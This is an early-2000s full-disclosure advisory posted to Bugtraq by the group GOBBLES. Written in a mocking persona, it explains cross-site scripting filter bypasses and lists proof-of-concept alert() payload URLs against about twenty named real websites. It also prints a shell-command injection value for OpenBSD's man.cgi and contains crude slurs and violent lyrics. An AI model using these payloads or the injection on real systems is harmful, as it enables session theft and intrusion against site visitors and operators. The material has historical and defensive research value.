What follows is GOBBLES advisory #33. The original version was inappropriate for the list (http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml#0.1.3). With the permission of GOBBLES, an edited advisory is now being sent out. The original, unedited version is located at: http://www.bugtraq.org/advisories/GOBBLES-33.txt --- Hi, We saw the Administrivia post today, so we decided to send this in. Hopefully it's not too late. The post mentioned that new forms of cross-site scripting attacks would be accepted. Well, as you'll see, we have some nifty tricks that are discussed, and also some major products are totally torn apart. Most of the sites allow you to download their custom scripts (e.g. man.cgi) so we believe we are justified in giving examples of sites that are affected, especially since this has been the norm on the security lists for a while now. Thanks to all the administrators who were good sports over this. GOBBLES SECURITY http://www.bugtraq.org/ GOBBLES@hushmail.com GOBBLES SECURITY ADVISORY #33 Compass, Square, and Slide-rule New Generation CSS ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ############################################################################ # # # CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS # # # # # ############################################################################ ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! I'm over it You see I'm falling in the fast abyss Clouded by memories of the past At last I see I hear it fading, I can't speak it Oh yes you will dig my grave You feeling, finding, always whining Take my hand now be alive You see I cannot be forsaken Because I'm not the only one We walk amongst you feeding, raping Must we hide from everyone? Before we begin, we'd like to mention that recently we've been overwhelmed with emails from journalists asking us questions about our security group. GOBBLES like this very much because it is sign of his crew becoming very famous and ubiquitous. We be accused of seeking fame and job offers. To this GOBBLES say no, we not after job offers, but yes, we after as much fame and attention as possible and this is why we will be disclosing more serious remote vulnerabilities in OS like Solaris and IRIX in near future. Remote exploit for IRIX can then be complemented with upcoming GOBBLES IRIX backdoor. Current misinterpretation about what GOBBLES mean when he say he group seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of non-disclosure and is being sarcastic. This is wrong, disclosure of rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current development project 'lestat' for another default RPC service in Solaris is leading to further proof that GOBBLES is avid supporter of full-disclosure, especially because it great way to annoy as many Fascists, Communists, and McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is becoming as famous as possible. We now co-existing with Bugtraq, making the peace, being ethical, etc. BACKGROUND ========== Been a lot of fanfare about cross-site scripting in recent times. Person suggest changing acronym from CSS to XSS so it different from Cascading Style Sheets, but this not really good move because XSS conflict with XML Security Suite from IBM (they company who make computer systems, probably not big fans of stem cell research HEHEHEHEHEHEHEHE). When GOBBLES Security first dreamed of the CSS technique, pioneered it, refined it, and perfected it, we knew of the dastardly tool of mass destruction that had just materialized. Here was something that could make Joe Average a security expert, something that could be wielded by the little guy to sting and subdue the domineering commercial bullies. A well-planted CSS attack can undermine the reputation of even the most stringent corporations, thus making it one of the most effective political tools known in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology Group, and the Achilles Heel of the infosec world. INNOVATIVE CSS TECHNIQUES ========================= * JavaScript entities - --------------------- Only hotmail security historians like those at GOBBLES Security know of obscure feature in JavaScript language that make it easy to bypass thing like "<...>", "<script>...</script>", and "javascript:" filter for CSS attack using JavaScript. That is thing called JavaScript entity. Like... &{alert('GOBBLES')}; When url-encoded become... %26%7balert%28%27GOBBLES%27%29%7d%3b The beauty of this technique for the adorned CSS exploiter is that the GOBBLES CSS JavaScript Entity can appear almost anywhere with good results. Note that "CERT" page below make no mention of this at all and even say that ampersand is not relied upon by current exploits. Well, now it is. http://www.cert.org/tech_tips/malicious_code_mitigation.html For reference, HTML4 specification only require you to encode the following: ; %3b / %2f ? %3f : %3a @ %40 = %3d & %26 < %3c > %3e " %22 # %23 % %25 { %7b } %7d | %7c \ %5c ^ %5e ~ %7e [ %5b ] %5d ` %60 Until now, that encoding information was private knowledge of the underground. GOBBLES is about information dissemination and believe information wants to be free, though. So really GOBBLES see no need why he should have to justify the disclosure of the encoding techniques. If GOBBLES didn't do it, someone would have, and it best this come from a whitehat retard than from someone making the big dollar. Sometimes in URLs below we can't encode parameter, but this no problem for GOBBLES because smart thing to do is just not enter the character encoded, i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>' does not get entered as '%3e'. Why? Because sometimes in URLs below we can't encode parameter. * HTML string completion / HTML closure - --------------------------------------- Principles are basically identical to SQL injection technique. Doesn't need much coverage since it pretty obvious to anyone with rational mind. GOBBLES will let "CERT" write a dissertation on it. Essentially... *** HTML string completion: <a href="[...]$user_provided"> Make $user_provided: " attribute="malicious_data Then original text becomes <a href="[...]" attribute="malicious data"> Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick, etc. But can just use common attribute like 'id' and just insert GOBBLES CSS JavaScript Entity. *** HTML closure: <a href="[...]$user_provided"> Make $user_provided: "> <tag attribute="malicious data"> Then original text becomes <a href="[...]"> <tag attribute="malicious data">"> Good way to introduce <script> tag, etc. Or GOBBLES CSS JavaScript Entity can be inserted. Again, these two are blatantly obvious and probably have many appearance on the Vuln-Dev already. GOBBLES CSS JavaScript Entity Technique make them almost obsolete. THE VULNERABILITIES =================== 1. openbsd.org / man.cgi - ------------------------ You can get source code like so: http://www.openbsd.org/cgi-bin/man.cgi/source Should be noted that up until a few months ago, '/usr/include' processing was vulnerable to simple PERL open() attack. sub include_output { local($inc) = @_; &http_header("text/plain"); open(I, "$inc") || do { print "open $inc: $!\n"; exit(1) }; while(<I>) { print } close(I); } So you could do like... http://www.openbsd.org/cgi-bin/man.cgi/usr/include;IFS=G;unameG-a;| ... work your way up to local access and core the box with your Solaris locals. Then they try thing like -T taint switch, removing /bin/sh, etc. but futile attempt since existence of GOBBLESpserver-ex.c that will be disclosed soon (hehehe, Theo, I HATE YOU!). We mention this in case other people using version of man.cgi from their site from a while ago. OK, for CSS hole, just a simple matter of linking to... http://www.openbsd.org/cgi-bin/man.cgi?query=%26%7balert%28%27GOBBLES%27%29%7d %3b&apropos=hehehe Examine HTML source to see how GOBBLES CSS JavaScript Entity Technique bypasses the most anal filtering, even when "javascript:..." not always appropriate and automatic JavaScript event handlers don't apply. <INPUT VALUE="&{alert('GOBBLES')};" NAME="query"> Shouldn't be too hard to think of how malicious website owner can use this for CSS attacks against visitor web browser that implicitly trusts openbsd.org -- and who wouldn't since it the cornerstone of security? 2. happyhacker.org / thttpd webserver proper / thttpd ssi program - ----------------------------------------------------------------- The default 404 handling of the thttpd webserver is vulnerable to CSS attacks. All you have to do is.... http://thttpd-site/<script>alert('GOBBLES');</script>/ OR http://thttpd-site/cgi-bin/ssi/<script>alert('GOBBLES');</script>/ Note that it doesn't decode url-encoding, you may have mixed results using spacing in the URL, and the default <script> language for Netscape (at least) is JavaScript. Examples: http://www.happyhacker.org/<script>alert('GOBBLES');</script>/ http://www.happyhacker.org/cgi-bin/ssi/%3cp+align%3D%26%7balert%28%27GOBBLES%27 %29%7d%3b%3e Both were tested against the latest stable version of thttpd from... http://www.acme.com/software/thttpd/thttpd-2.20c.tar.gz ... so this time the developer can't downplay the findings of the GOBBLES Security Research Organization like he did with our theoretically exploitable off-by-one, nor can he invent fake CHANGELOG entries (google cache catch you out there my friend). 3. thievco.com / Matt Wright's guestbook script - ----------------------------------------------- GOBBLES regularly visit The Blue Boar's website in search of hacking information, so it incumbent upon GOBBLES to alert world to presence of cross-site scripting hole in The Blue Boar's website and, more importantly, in Matt Wright's guestbook script. Matt Wright's guestbook script can be found at: http://worldwidemart.com/scripts/guestbook.shtml To he credit, he has $allow_html variable that can strip "<...>" stuff, but once again, GOBBLES trademarked JavaScript Entity CSS Technique come to the rescue. Incidentally, The Blue Boar allows html in his guestbook fields, but as we just said, the presence of this does not determine whether or not we can use our CSS technique. We always can. if ($FORM{'url'}) { print GUEST "<a href=\"$FORM{'url'}\">$FORM{'realname'}</a>"; } You see, even if html form do not have 'url' parameter, remote attacker can still create their own local html form pointing at The Blue Boar's website or some other site with Matt Wright's guestbook script. This permits them to inject malicious data via 'url' parameter that will allow CSS attacks on anyone viewing the guestbook. Script can only be called with POST method, so it can't be linked to, but this is moot point because with permanent malicious CSS data in actual guestbook, attacker can just drop it there and leave, knowing that if site store authentication information in cookies or whatever, anyone viewing guestbook with JavaScript enabled will be slain by malicious code in attacker guestbook entry. This is obviously a very devastating vulnerability. CSS hole are sometimes overlooked, but luckily in this world there are security masterminds with a razor sharp logic -- they miss nothing. These masterminds are your only salvation. Without their marvellous creativity and insight, the Internet would be a very scary place indeed. Hereeeeeeeeeeeeeeeeeeeeeee's Johnnnnnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy! 4. antionline.com / fatelabs.com / vbulletin php package - -------------------------------------------------------- There are tons of bugs in the latest version of this package. It's commercial, so you can only download a Lite version, but GOBBLES have a network of contacts in the warez scene and was able to obtain both the version 2.0.3 that Antionline is built on and the latest version. Antionline switched from PERL to PHP last year. GOBBLES have script that can ethically hack John Vranesevich's site in 5-10 seconds. Only interested in CSS bugs here, though. The bug is like vbulletin cross-site scripting hole revealed here: http://online.securityfocus.com/archive/1/263609/2002-05-01/2002-05-07/0 But big difference is that GOBBLES CSS JavaScript Entity Technique and the other techniques mentioned above make many, many, many more portions of the code vulnerable. Examples: http://www.antionline.com/mod/index.php?redirect=&{alert('GOBBLES')}; http://forums.fatelabs.com/mod/index.php?redirect=&{alert('GOBBLES')}; Looking at HTML source show how GOBBLES CSS Javascript Entity can appear anywhere in attribute value, which make it very flexible. <input type="hidden" name="redirect" value="/mod/index.php?redirect=&{alert('GOBBLES')};&[...] FateLabs uses version 2.0.0 of this script which is just as vulnerable to remote command execution. 5. cern.ch - ---------- http://consult.cern.ch/xwho/people/<script>alert('GOBBLES');</script> http://consult.cern.ch/xwho/people/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7 d %3b%3e Hacking is bad, you butt pirate. 6. cansecwest.com - ----------------- http://www.cansecwest.com/register.cgi?Name=%26%7Balert%28%27GOBBLES%27%29%7D%3B &Addr1=G&City=G&State=G&Country=G&Zip=G&Email=G%40G.G&Phone=G&rm=mode3 &session=729%3A601e5c2e26fa3c87e656ef1b484f8fc3 Session ID may be problem here. 7. sans.org / incidents.org / discus pro / htdig's htsearch - ----------------------------------------------------------- http://forum.sans.org/cgi-bin/discus/board-profile.cgi?action=%3cp+align%3d %26%7balert%28%27GOBBLES%27%29%7d%3b%3e http://forum.sans.org/cgi-bin/discus/board-search.cgi?query=%3cp+align%3d %26%7balert%28%27GOBBLES%27%29%7d%3b (notice no trailing '>') This is a commercial package, so we unable to do a full audit and narrow down all problems in source, but GOBBLES team was able to bust 7 different cross-site scripting attacks using sans.org cgi scripts in 10 minutes of searching. GOBBLES expect that the forum itself will be heavily vulnerable to CSS attack, and this very dangerous for sans.org because of way in which they interact with their visitor member. Both sans.org and incidents.org use htdig htsearch program. We know of one CSS attack in this (probably many more), but since revelation of CSS hole also give revelation of buffer overflow in C++ code, GOBBLES think it best to leave that for future advisory all on its own. Hehehehehehe, give GOBBLES time to write up remote brute forcing exploit again and wait for l0pht.com to return with their htdig hehehehe J/K! :PPPPPPPPPPPPPPPPPPPPPPPP. This hint for developer to look at code. 8. 2600.com - ----------- http://www.2600.com/cgi-bin/covers.pl?issue=%26%7balert%28%27GOBBLES%27%29%7d%3b in this day and age of security, especially with the fast pace that GOBBLES sets as a standard. Gone are the days of password brute forcing, phf attacks, and how2knowifyouhavefoundyournewageethicalhacker. HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC BBS Y0 BACK IN THE OLD SCHOOL DAYZ RPGS FIELD PHREAKING BACKPACKZ B00ZE HACKING WANTED FOR UPCOMING 2600 MEETINGS HACKING PHREAKING ********************************* PHREAKING VIRII m0r3 buckt00th sn0tty-n0s3d 4cn3 VIRII ANARCHY f4ct0ry f@s0z ANARCHY CRACKING/CARDING CRACKING/CARDING TELCO MANUALZ RADIOSHACK BACKYARD DRUG LABZ GFX CARDZ SERIAL PORT KRAYZEE HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC 9. snort.org - ------------ http://www.snort.org/external/?url=javascript:%22+onMouseOver%3d %22alert('GOBBLES')%3b Also, GOBBLES has discovered a Cross-Cross-Site Scripting (CCSS)(tm) class of holes while researching the snort.org Cross-Site Scripting vulnerability. This permit attacker to do like... http://www.snort.org/external/?url=http://somesite/index.php?malicious_data You see, sometimes thing like index.php will return QUERY_STRING in displayed page. Shouldn't be too hard to imagine the transitive nature of this attack -- we have CSS, CCSS, CCCSS, CCCCSS, CCCCCSS, ..., C^nSS. bash-2.05a$ SERIES="CSS";while true;do echo $SERIES;SERIES="C$SERIES";done So if attacker can make site A cause CSS on site B and attacker can make site B cause CSS on site C, then attacker can make site A cause CSS on site C. This is hypothetical syllogism. 10. takedown.com / modified Matt Wright's guestbook script - ---------------------------------------------------------- Same technique is used as for The Blue Boar's site. Hehehehe, you even see where GOBBLES left Shimmy a message here: http://www.takedown.com/guestbook/guestbook.html But that not all! Hehehe, there more CGI fun on Shimomura's site that he created for defamation remission, but GOBBLES will let you find it hehe. It OK Tsutomu, GOBBLES still think you elite hehehehehehehehe ;>>>>>>. GOBBLES know all the techniques: crazy monkey, sendmail, bind! 11. nessus.org / freebsd.org / cvsweb - ------------------------------------- http://cgi.nessus.org/cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28 %27GOBBLES%27%29%7d%3b%3e http://www.freebsd.org/cgi/cvsweb.cgi/%3cp+align%3D%26%7balert%28 %27GOBBLES%27%29%7d%3b%3e Hehehe, and a Theo bonus: http://www.openbsd.org/cgi-bin/cvsweb/%3cp+align%3D%26%7balert%28 %27GOBBLES%27%29%7d%3b%3e 12. owasp.org - ------------- http://owasp.org/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e These guys like to write all about web security, including cross-site scripting attacks. You can read about it here: http://www.owasp.org/asac/input_validation/css.shtml 13. whitehats.com - ----------------- http://www.whitehats.com/cgi/arachNIDS/Search?search=&{alert('GOBBLES')}; That just an example of dozens of CSS holes found on the whitehats website in different scripts, including the forums. When he get out we will send him email informing him of all the CSS and command execution bugs GOBBLES found on his website. GOBBLES appreciate work of Max Vision in the community; we make heavy use of his BIND9 fingerprint techniques and he keep a great database of signatures for snort that let us know when we've been owned. 14. ciac.org / nfr.com / webglimpse - ----------------------------------- >From ciac: http://www.ciac.org/cgi-bin/webglimpse/www/htdocs/ciac/archive?query=%3cp+align %3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e http://hoaxbusters.ciac.org/cgi-bin/webglimpse-hoaxbusters/www/hoaxbusters/ archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e >From nfr: http://www.nfr.com/cgi-bin/nfrsearch?query=hehehe&id=2&whole=%26%7balert%28 %27GOBBLES%27%29%7d%3b 15. cerias.purdue.edu - --------------------- http://www.cerias.purdue.edu/search/results.php?search=%3cp+align%3D%26 %7balert%28document.location%29%7d%3b%3e This script strip the single quotes, but any web puppy can get around this. TEAM GOBBLES in a hurry to meet closing Bugtraq CSS deadline so we couldn't check all scripts on this site, but because we fans of this site, we sent administrator an email pointing out the problems and telling him where he can find further information: "pp. 544-547 of book _Practical Unix & Internet Security_ describe CGI weakness in detail and you well-advised to purchase a copy of this book. GOBBLES have this book on he shelf and wouldn't be what he is today if he didn't read this amazing piece of literary accomplishment." 16. infowar.com - --------------- http://www.infowar.com/search/search_results.cfm?term1= <script>alert('GOBBLES');</script> There also several remote command execution vuln on Winny site. He been notified. 17. grc.com - ----------- http://grc.com/x/ne.dll?<script>alert('GOBBLES');</script> 18. acm.org - ----------- http://campus.acm.org/public/search/results.cfm?query=%3C%2F textarea%3E%3Cp+align%3D%26%7Balert%28%27GOBBLES%27%29%7D%3B This good example of HTML closure technique, i.e. using </textarea> to break out of one opened already and then busting cross-site scripting move in regular fashion. 19. security.nnov.ru - -------------------- http://security.nnov.ru/search/exploits.asp?keyword=&{alert('GOBBLES')}; GOBBLES certain he found this one before 3APA[...]A hehehehehe ;). 20. sun.com - ----------- http://sunsolve.sun.com/pub-cgi/show.pl?target=%26%7balert%28%27GOBBLES%27 %29%7d%3b Hehehehehe, 2+ default RPC remote root vulns coming to Bugtraq *VERY* soon. GOBBLES will be making the exploits very easy to use this time, because we had a lot of emails concerning rpc.rwalld from HotBabe, LinuxGal, etc. saying rpc.rwalld impossible to use. FINAL WORDS =========== We have ethically disclosed CSS holes in a number of sites by co-existing with Bugtraq and spreading the full-disclosure faith. We have also shared a few nuggets of information with the community we love. Because of the relatively low risk of the attack -- to say the least -- GOBBLES didn't find it necessary to inform all of the administrators. And in certain respects, GOBBLES think it really makes little difference to the security of the above sites anyway... Remember: all of the above sites are UNSAFE TO VISIT from untrusted websites, and some are even unsafe to visit directly with scripting enabled in your browser. There are many self-proclaimed CSS experts out there who will litter your inbox with their daily CSS discoveries, but there can only be one CSS king, and that king is GOBBLES. Don't accept any imitations. Sleep well, my friends.
